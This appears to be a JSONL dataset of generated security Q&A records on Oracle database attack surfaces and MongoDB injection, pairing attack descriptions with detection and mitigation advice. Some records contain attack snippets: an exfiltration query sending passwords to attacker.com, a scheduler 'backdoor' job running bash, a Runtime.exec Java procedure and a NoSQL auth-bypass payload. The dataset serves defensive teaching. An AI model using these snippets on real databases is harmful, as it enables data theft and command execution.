+{"id": "trtp-b8050713fe0d", "instruction": "How can Oracle UTL_HTTP and Network Packages lead to database security incidents?", "output": "Network packages enable database-initiated connections. Combined with SQL injection, attackers can exfiltrate data via HTTP, send SMTP messages, or establish command channels. ACLs are often misconfigured.\n\nCommon attack vectors include:\n- Data exfiltration via HTTP callback\n- SSRF through UTL_HTTP\n- Email sending for social engineering\n- Reverse TCP connections", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154764Z", "updated_at": "2025-12-17T19:35:42.154764Z"}
+{"id": "trtp-23742522402c", "instruction": "How can adversaries exploit Oracle UTL_HTTP and Network Packages?", "output": "Attack techniques involving Oracle UTL_HTTP and Network Packages:\n\n- Data exfiltration via HTTP callback\n- SSRF through UTL_HTTP\n- Email sending for social engineering\n- Reverse TCP connections\n\nDefenders can detect these attacks by:\n- UTL_HTTP/UTL_TCP execution\n- Outbound connections from database server\n- ACL grant changes", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154777Z", "updated_at": "2025-12-17T19:35:42.154777Z"}
+{"id": "trtp-ec94064265fd", "instruction": "What should analysts look for when monitoring for Oracle UTL_HTTP and Network Packages?", "output": "Methods for detecting Oracle UTL_HTTP and Network Packages attacks or anomalies:\n\n- UTL_HTTP/UTL_TCP execution\n- Outbound connections from database server\n- ACL grant changes\n- Network package function calls", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154789Z", "updated_at": "2025-12-17T19:35:42.154789Z"}
+{"id": "trtp-1c3975b41203", "instruction": "How can organizations protect against Oracle UTL_HTTP and Network Packages?", "output": "Security controls and preventive measures for Oracle UTL_HTTP and Network Packages:\n\n- Configure restrictive ACLs\n- Revoke EXECUTE on network packages\n- Block outbound database connections\n- Monitor network package usage\n\nNetwork packages enable database-initiated connections. Combined with SQL injection, attackers can exfiltrate data via HTTP, send SMTP messages, or establish command channels. ACLs are often misconfigured.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154800Z", "updated_at": "2025-12-17T19:35:42.154800Z"}
+{"id": "trtp-4a9b20e425c3", "instruction": "Show an example of Oracle UTL_HTTP and Network Packages.", "output": "Example of Oracle UTL_HTTP and Network Packages:\n\n```sql\n-- Data exfiltration via HTTP:\nSELECT UTL_HTTP.REQUEST('http://attacker.com/?data='||password) FROM users;\n\n-- Using HTTPURITYPE:\nSELECT HTTPURITYPE('http://attacker.com/'||password).GETCLOB() FROM users;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154810Z", "updated_at": "2025-12-17T19:35:42.154810Z"}
+{"id": "trtp-2aafe8ea79ee", "instruction": "What do security professionals need to know about Oracle UTL_FILE for File Access?", "output": "UTL_FILE package provides file I/O capabilities in Oracle. With proper directory objects and privileges, attackers can read and write files on the database server, including configuration files and potential webshells.\n\nSecurity Relevance: UTL_FILE enables filesystem access through SQL. Directory objects control access paths. Misconfigured directories with broad access enable attackers to read sensitive files or write backdoors.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156768Z", "updated_at": "2025-12-17T19:35:42.156768Z"}
+{"id": "trtp-ee0e8704e19c", "instruction": "What are the key components of Oracle UTL_FILE for File Access?", "output": "Oracle UTL_FILE for File Access consists of the following key components:\n\n- UTL_FILE package\n- DIRECTORY objects\n- READ/WRITE directory privileges\n- UTL_FILE_DIR parameter (deprecated)\n- File operations (FOPEN, PUT_LINE, GET_LINE)", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156835Z", "updated_at": "2025-12-17T19:35:42.156835Z"}
+{"id": "trtp-91db1b62b792", "instruction": "What security risks are associated with Oracle UTL_FILE for File Access?", "output": "UTL_FILE enables filesystem access through SQL. Directory objects control access paths. Misconfigured directories with broad access enable attackers to read sensitive files or write backdoors.\n\nCommon attack vectors include:\n- Read configuration files\n- Write webshells to web directories\n- Read Oracle password files\n- Data exfiltration to accessible paths", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156850Z", "updated_at": "2025-12-17T19:35:42.156850Z"}
+{"id": "trtp-464fb6005c50", "instruction": "What are common attack techniques involving Oracle UTL_FILE for File Access?", "output": "Attack techniques involving Oracle UTL_FILE for File Access:\n\n- Read configuration files\n- Write webshells to web directories\n- Read Oracle password files\n- Data exfiltration to accessible paths\n\nDefenders can detect these attacks by:\n- UTL_FILE function calls\n- Directory object creation\n- File operations in audit logs", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156864Z", "updated_at": "2025-12-17T19:35:42.156864Z"}
+{"id": "trtp-0074ead78b68", "instruction": "What should analysts look for when monitoring for Oracle UTL_FILE for File Access?", "output": "Methods for detecting Oracle UTL_FILE for File Access attacks or anomalies:\n\n- UTL_FILE function calls\n- Directory object creation\n- File operations in audit logs\n- Unusual file access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156876Z", "updated_at": "2025-12-17T19:35:42.156876Z"}
+{"id": "trtp-50af86bbd7f6", "instruction": "How can organizations protect against Oracle UTL_FILE for File Access?", "output": "Security controls and preventive measures for Oracle UTL_FILE for File Access:\n\n- Restrict directory object creation\n- Limit directory paths\n- Revoke UTL_FILE EXECUTE\n- Audit UTL_FILE usage\n\nUTL_FILE enables filesystem access through SQL. Directory objects control access paths. Misconfigured directories with broad access enable attackers to read sensitive files or write backdoors.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156889Z", "updated_at": "2025-12-17T19:35:42.156889Z"}
+{"id": "trtp-a16724105508", "instruction": "What is the syntax for Oracle UTL_FILE for File Access?", "output": "Example of Oracle UTL_FILE for File Access:\n\n```sql\n-- Create directory object:\nCREATE OR REPLACE DIRECTORY ext_dir AS '/tmp';\nGRANT READ, WRITE ON DIRECTORY ext_dir TO attacker;\n\n-- Read file:\nDECLARE\n  f UTL_FILE.FILE_TYPE;\n  line VARCHAR2(4000);\nBEGIN\n  f := UTL_FILE.FOPEN('EXT_DIR', 'target.txt', 'R');\n  UTL_FILE.GET_LINE(f, line);\n  DBMS_OUTPUT.PUT_LINE(line);\n  UTL_FILE.FCLOSE(f);\nEND;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156899Z", "updated_at": "2025-12-17T19:35:42.156899Z"}
+{"id": "trtp-9614d04dd715", "instruction": "What do security professionals need to know about Oracle DBMS_SCHEDULER for Code Execution?", "output": "DBMS_SCHEDULER enables job scheduling in Oracle. Attackers create malicious jobs for command execution, persistence, and privilege escalation. Scheduler jobs run with elevated privileges.\n\nSecurity Relevance: DBMS_SCHEDULER can execute OS commands via external jobs. Combined with SQL injection, attackers establish persistence and execute arbitrary code. Jobs survive database restarts.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159181Z", "updated_at": "2025-12-17T19:35:42.159181Z"}
+{"id": "trtp-ae282554dd85", "instruction": "What elements make up Oracle DBMS_SCHEDULER for Code Execution?", "output": "Oracle DBMS_SCHEDULER for Code Execution consists of the following key components:\n\n- DBMS_SCHEDULER package\n- Job types (executable, PL/SQL)\n- Program and schedule objects\n- Credential objects\n- External job execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159233Z", "updated_at": "2025-12-17T19:35:42.159233Z"}
+{"id": "trtp-1e67ba7ff9d3", "instruction": "What security risks are associated with Oracle DBMS_SCHEDULER for Code Execution?", "output": "DBMS_SCHEDULER can execute OS commands via external jobs. Combined with SQL injection, attackers establish persistence and execute arbitrary code. Jobs survive database restarts.\n\nCommon attack vectors include:\n- OS command execution via external jobs\n- Persistence through scheduled jobs\n- Privilege escalation via job credentials\n- Remote code execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159248Z", "updated_at": "2025-12-17T19:35:42.159248Z"}
+{"id": "trtp-a78f8b851966", "instruction": "How do attackers abuse Oracle DBMS_SCHEDULER for Code Execution?", "output": "Attack techniques involving Oracle DBMS_SCHEDULER for Code Execution:\n\n- OS command execution via external jobs\n- Persistence through scheduled jobs\n- Privilege escalation via job credentials\n- Remote code execution\n\nDefenders can detect these attacks by:\n- Job creation events\n- External job execution\n- Unusual scheduler activity", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159262Z", "updated_at": "2025-12-17T19:35:42.159262Z"}
+{"id": "trtp-86e098e056c8", "instruction": "What indicators reveal malicious activity involving Oracle DBMS_SCHEDULER for Code Execution?", "output": "Methods for detecting Oracle DBMS_SCHEDULER for Code Execution attacks or anomalies:\n\n- Job creation events\n- External job execution\n- Unusual scheduler activity\n- Job credential changes", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159273Z", "updated_at": "2025-12-17T19:35:42.159273Z"}
+{"id": "trtp-ee6d375c804b", "instruction": "What security controls mitigate Oracle DBMS_SCHEDULER for Code Execution risks?", "output": "Security controls and preventive measures for Oracle DBMS_SCHEDULER for Code Execution:\n\n- Restrict CREATE JOB privilege\n- Disable external job execution\n- Monitor scheduler activity\n- Audit job creation/modification\n\nDBMS_SCHEDULER can execute OS commands via external jobs. Combined with SQL injection, attackers establish persistence and execute arbitrary code. Jobs survive database restarts.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159285Z", "updated_at": "2025-12-17T19:35:42.159285Z"}
+{"id": "trtp-f4339b5087d1", "instruction": "Provide a code example for Oracle DBMS_SCHEDULER for Code Execution.", "output": "Example of Oracle DBMS_SCHEDULER for Code Execution:\n\n```sql\n-- Create external job for command execution:\nBEGIN\n  DBMS_SCHEDULER.CREATE_JOB(\n    job_name => 'backdoor',\n    job_type => 'EXECUTABLE',\n    job_action => '/bin/bash',\n    number_of_arguments => 2,\n    enabled => FALSE\n  );\n  DBMS_SCHEDULER.SET_JOB_ARGUMENT_VALUE('backdoor', 1, '-c');\n  DBMS_SCHEDULER.SET_JOB_ARGUMENT_VALUE('backdoor', 2, 'whoami > /tmp/pwned');\n  DBMS_SCHEDULER.ENABLE('backdoor');\nEND;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159305Z", "updated_at": "2025-12-17T19:35:42.159305Z"}
+{"id": "trtp-01573416ef76", "instruction": "What is Oracle Java Stored Procedures and why is it important for database security?", "output": "Oracle supports Java stored procedures that run within the database JVM. Java provides powerful capabilities including file I/O, network access, and process execution - dangerous when exploited.\n\nSecurity Relevance: Java stored procedures can execute arbitrary code with OS-level access. The Java permissions model can be bypassed or misconfigured. Java provides capabilities beyond PL/SQL.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161200Z", "updated_at": "2025-12-17T19:35:42.161200Z"}
+{"id": "trtp-e2b703a72db0", "instruction": "What elements make up Oracle Java Stored Procedures?", "output": "Oracle Java Stored Procedures consists of the following key components:\n\n- Oracle JVM (OJVM)\n- loadjava utility\n- Java permissions model\n- DBMS_JAVA package\n- Java Runtime.exec()", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161219Z", "updated_at": "2025-12-17T19:35:42.161219Z"}
+{"id": "trtp-9eb005297d4c", "instruction": "What security risks are associated with Oracle Java Stored Procedures?", "output": "Java stored procedures can execute arbitrary code with OS-level access. The Java permissions model can be bypassed or misconfigured. Java provides capabilities beyond PL/SQL.\n\nCommon attack vectors include:\n- Runtime.exec() for command execution\n- File operations through Java I/O\n- Network operations via Java sockets\n- Permission bypass techniques", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161234Z", "updated_at": "2025-12-17T19:35:42.161234Z"}
+{"id": "trtp-8714605d994a", "instruction": "What attacks exploit Oracle Java Stored Procedures?", "output": "Attack techniques involving Oracle Java Stored Procedures:\n\n- Runtime.exec() for command execution\n- File operations through Java I/O\n- Network operations via Java sockets\n- Permission bypass techniques\n\nDefenders can detect these attacks by:\n- Java source/class loading\n- Java execution privileges\n- DBMS_JAVA usage", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161248Z", "updated_at": "2025-12-17T19:35:42.161248Z"}
+{"id": "trtp-eda0f351db8e", "instruction": "What log entries indicate Oracle Java Stored Procedures attacks?", "output": "Methods for detecting Oracle Java Stored Procedures attacks or anomalies:\n\n- Java source/class loading\n- Java execution privileges\n- DBMS_JAVA usage\n- JVM process spawning", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161259Z", "updated_at": "2025-12-17T19:35:42.161259Z"}
+{"id": "trtp-d8a346576124", "instruction": "How do you defend against Oracle Java Stored Procedures attacks?", "output": "Security controls and preventive measures for Oracle Java Stored Procedures:\n\n- Restrict Java privileges\n- Remove OJVM if not needed\n- Monitor loadjava usage\n- Audit Java permission grants\n\nJava stored procedures can execute arbitrary code with OS-level access. The Java permissions model can be bypassed or misconfigured. Java provides capabilities beyond PL/SQL.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161271Z", "updated_at": "2025-12-17T19:35:42.161271Z"}
+{"id": "trtp-aa4b320a8e69", "instruction": "What does Oracle Java Stored Procedures look like in SQL?", "output": "Example of Oracle Java Stored Procedures:\n\n```sql\n-- Java procedure for command execution:\nCREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED \"ExecCmd\" AS\nimport java.io.*;\npublic class ExecCmd {\n  public static String exec(String cmd) throws Exception {\n    Process p = Runtime.getRuntime().exec(cmd);\n    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));\n    StringBuilder sb = new StringBuilder();\n    String line;\n    while ((line = br.readLine()) != null) sb.append(line);\n    return sb.toString();\n  }\n};\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161282Z", "updated_at": "2025-12-17T19:35:42.161282Z"}
+{"id": "trtp-c87e640de644", "instruction": "How does Oracle TNS Listener Security work and what are its security implications?", "output": "The TNS Listener handles Oracle client connections. TNS Poisoning and listener exploitation can redirect connections, intercept credentials, or cause denial of service. Listener security is often overlooked.\n\nSecurity Relevance: TNS Poisoning enables man-in-the-middle attacks against Oracle connections. Unprotected listeners can be remotely administered. Dynamic registration can be abused to redirect connections.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163046Z", "updated_at": "2025-12-17T19:35:42.163046Z"}
+{"id": "trtp-30c79d3f145a", "instruction": "What are the main parts of Oracle TNS Listener Security that security teams should understand?", "output": "Oracle TNS Listener Security consists of the following key components:\n\n- TNS Listener service\n- listener.ora configuration\n- Dynamic registration\n- ADMIN_RESTRICTIONS\n- Local OS authentication", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163066Z", "updated_at": "2025-12-17T19:35:42.163066Z"}
+{"id": "trtp-85efff04b2de", "instruction": "What security risks are associated with Oracle TNS Listener Security?", "output": "TNS Poisoning enables man-in-the-middle attacks against Oracle connections. Unprotected listeners can be remotely administered. Dynamic registration can be abused to redirect connections.\n\nCommon attack vectors include:\n- TNS Poisoning for connection hijacking\n- Remote listener administration\n- Service registration attacks\n- Password interception", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163081Z", "updated_at": "2025-12-17T19:35:42.163081Z"}
+{"id": "trtp-e76dec0a6a6b", "instruction": "What threats are associated with Oracle TNS Listener Security?", "output": "Attack techniques involving Oracle TNS Listener Security:\n\n- TNS Poisoning for connection hijacking\n- Remote listener administration\n- Service registration attacks\n- Password interception\n\nDefenders can detect these attacks by:\n- Unauthorized listener commands\n- Unexpected service registrations\n- Listener log analysis", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163094Z", "updated_at": "2025-12-17T19:35:42.163094Z"}
+{"id": "trtp-a4713bf004c7", "instruction": "What log entries indicate Oracle TNS Listener Security attacks?", "output": "Methods for detecting Oracle TNS Listener Security attacks or anomalies:\n\n- Unauthorized listener commands\n- Unexpected service registrations\n- Listener log analysis\n- Connection pattern anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163106Z", "updated_at": "2025-12-17T19:35:42.163106Z"}
+{"id": "trtp-6ad2cfd43d6b", "instruction": "What preventive measures address Oracle TNS Listener Security vulnerabilities?", "output": "Security controls and preventive measures for Oracle TNS Listener Security:\n\n- Enable ADMIN_RESTRICTIONS\n- Use LOCAL_OS_AUTHENTICATION\n- Restrict dynamic registration\n- Enable listener logging\n\nTNS Poisoning enables man-in-the-middle attacks against Oracle connections. Unprotected listeners can be remotely administered. Dynamic registration can be abused to redirect connections.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163117Z", "updated_at": "2025-12-17T19:35:42.163117Z"}
+{"id": "trtp-cd3f5ed05ae1", "instruction": "Provide a code example for Oracle TNS Listener Security.", "output": "Example of Oracle TNS Listener Security:\n\n```sql\n# Secure listener.ora:\nLISTENER =\n  (DESCRIPTION =\n    (ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = 1521))\n  )\n\nADMIN_RESTRICTIONS_LISTENER = ON\nSECURE_REGISTER_LISTENER = (IPC)\nSECURE_CONTROL_LISTENER = (IPC)\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163127Z", "updated_at": "2025-12-17T19:35:42.163127Z"}
+{"id": "trtp-b1437ea94eaf", "instruction": "Explain MongoDB Injection from a security perspective.", "output": "MongoDB injection exploits occur when user input is incorporated into MongoDB queries without proper sanitization. Unlike SQL, MongoDB uses JSON/BSON queries with operators like $gt, $ne, $where that can be injected.\n\nSecurity Relevance: MongoDB injection bypasses authentication, extracts data, and in some cases enables code execution. Developers incorrectly assume NoSQL is immune to injection. Modern frameworks may still be vulnerable.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164873Z", "updated_at": "2025-12-17T19:35:42.164873Z"}
+{"id": "trtp-1d59773aebbb", "instruction": "What are the key components of MongoDB Injection?", "output": "MongoDB Injection consists of the following key components:\n\n- Query operator injection ($gt, $ne, $or)\n- JavaScript execution ($where)\n- JSON parsing vulnerabilities\n- Array operator abuse\n- Aggregation pipeline injection", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164893Z", "updated_at": "2025-12-17T19:35:42.164893Z"}
+{"id": "trtp-b2eea1f3e011", "instruction": "How can MongoDB Injection lead to database security incidents?", "output": "MongoDB injection bypasses authentication, extracts data, and in some cases enables code execution. Developers incorrectly assume NoSQL is immune to injection. Modern frameworks may still be vulnerable.\n\nCommon attack vectors include:\n- Auth bypass: {\"password\": {\"$ne\": \"\"}}\n- Data extraction: {\"$gt\": \"\"}\n- $where JavaScript injection\n- Regex-based data extraction\n- Aggregation pipeline manipulation", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164908Z", "updated_at": "2025-12-17T19:35:42.164908Z"}
